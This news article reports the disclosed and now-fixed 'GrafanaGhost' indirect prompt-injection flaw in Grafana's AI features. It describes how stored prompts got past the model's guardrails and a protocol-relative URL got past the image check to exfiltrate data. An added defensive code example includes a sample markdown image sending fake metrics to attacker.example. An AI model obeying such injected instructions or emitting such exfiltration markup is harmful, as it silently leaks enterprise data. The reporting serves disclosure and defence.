UPDATED 09:00 EDT / APRIL 07 2026

SECURITY

‘GrafanaGhost’ vulnerability allowed for silent data exfiltration through AI workflows

A new report out today from artificial intelligence security platform company Noma Security Inc. details a recently discovered vulnerability in Grafana that allowed sensitive enterprise data to be exfiltrated silently through the platform’s AI features.

Dubbed “GrafanaGhost,” the vulnerability could have let an attacker bypass both client-side protections and AI guardrails to send private data from a Grafana environment to an external server without phishing, user approval or visible signs of compromise.

Grafana, from Grafana Labs Inc., is an open-source observability and analytics platform that is used to visualize, monitor and analyze data from multiple sources in real time. The platform is widely deployed in enterprises to track infrastructure performance, application metrics and business data through customizable dashboards and alerts.

According to Noma Security’s researchers, an attack using the vulnerability started by identifying a location where crafted prompts could be stored and later processed by Grafana’s AI components. The prompts could be made to look legitimate within normal workflows, so malicious instructions could be introduced without raising immediate suspicion.

The researchers at first attempted to exfiltrate data using standard image tags that would transmit sensitive information to an external server. Although Grafana includes protections to block external image loading, Noma said those controls could be bypassed by exploiting weaknesses in how the application validates URLs.

The vulnerability stemmed from client-side logic that treated any image source beginning with a slash as a relative path. A protocol-relative URL, one beginning with two slashes, also begins with a slash and so passed that check, but the browser resolves it against the current page’s scheme to whatever host follows the slashes, so the image request went to an external domain.

The final step in the attack involved bypassing the model’s own safety protections. Noma said that including specific keywords in the indirect prompt caused the model to interpret the instructions as legitimate, thereby allowing malicious image markdown to be processed and allowing data exfiltration to occur automatically in the background.
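The image-source check described above, as an added example that is not Grafana’s code and not taken from Noma’s report: a client-side check of the shape the article describes (a source is treated as local if it starts with a slash), beside a hardened check that resolves the source the way the browser will and compares origins. Function names, the dashboard origin and the sample model output are constructed for illustration. The example also goes beyond the article by covering a backslash-prefixed variant, which WHATWG-compliant URL parsers treat the same way as a double slash for `http`/`https` bases.

```javascript
// Added example, not Grafana's code. Names and sample data are hypothetical.

// Constructed page origin; a real dashboard would use window.location.origin.
const DASHBOARD_ORIGIN = "https://grafana.example";

// Flawed check of the kind the article describes: anything that starts with "/"
// is assumed to be a same-origin relative path. "//attacker.example/x.png" passes.
function flawedIsLocalImage(src) {
  return src.startsWith("/");
}

// Hardened check: resolve the candidate exactly as the browser will (against the
// page origin) and accept it only when the resolved origin is the dashboard's own.
// Rejects "//host/...", "\\host/...", absolute URLs and unparsable input alike.
function hardenedIsLocalImage(src, baseOrigin = DASHBOARD_ORIGIN) {
  let resolved;
  try {
    resolved = new URL(src, baseOrigin);
  } catch {
    return false; // not a URL at all: reject rather than guess
  }
  return resolved.origin === new URL(baseOrigin).origin;
}

// Where the browser would actually send the image request for a given src.
function resolveImageTarget(src, baseOrigin = DASHBOARD_ORIGIN) {
  return new URL(src, baseOrigin).href;
}

// Pull the destination out of a markdown image, ![alt](url), which is the form
// the article says the injected prompt steered the model into emitting.
function extractMarkdownImageSrc(markdown) {
  const match = /!\[[^\]]*\]\(([^)\s]+)\)/.exec(markdown);
  return match ? match[1] : null;
}

// Constructed sample of model output carrying a protocol-relative exfil URL
// with a fake metric in the query string.
const SAMPLE_MODEL_OUTPUT =
  "Here is your summary. ![status](//attacker.example/collect?d=q3_revenue%3D12.4M)";

// Run the sample through both checks and report where the request would go.
function demo() {
  const src = extractMarkdownImageSrc(SAMPLE_MODEL_OUTPUT);
  return {
    src,
    flawedAllows: flawedIsLocalImage(src),
    hardenedAllows: hardenedIsLocalImage(src),
    browserFetches: resolveImageTarget(src),
  };
}

console.log(demo());
```

The design point is that a prefix test on the raw string answers a different question from the one the browser will ask; resolving with `new URL(src, base)` and comparing `origin` asks the same question the browser does, so the two cannot disagree.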

Noma Security practices responsible disclosure: Grafana was contacted before the details were released, and the vulnerability was addressed.

Grafana’s team worked with Noma’s researchers to validate the findings and rolled out a fix as quickly as possible to secure its users. Noma said it was “an excellent example of researchers and builders working together to make AI safer for everyone.”

Ram Varadarajan, chief executive at cyber deception technology company Acalvio Technologies Inc., told SiliconANGLE via email that “GrafanaGhost perfectly illustrates how AI integration creates a massive security blind spot by using system components exactly as designed, but with instructions the model cannot verify as malicious.”

“Because indirect prompt injection bypasses traditional defenses — requiring no credentials or user interaction — it allows attackers to silently exfiltrate sensitive operational telemetry, such as financial metrics and infrastructure state, disguised as routine image renders,” said Varadarajan. “To defend against this, security teams must move beyond application-layer toggles to network-level URL blocking and treat prompt injection as a primary threat rather than an edge case.”

Ultimately, he added, “this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does.”
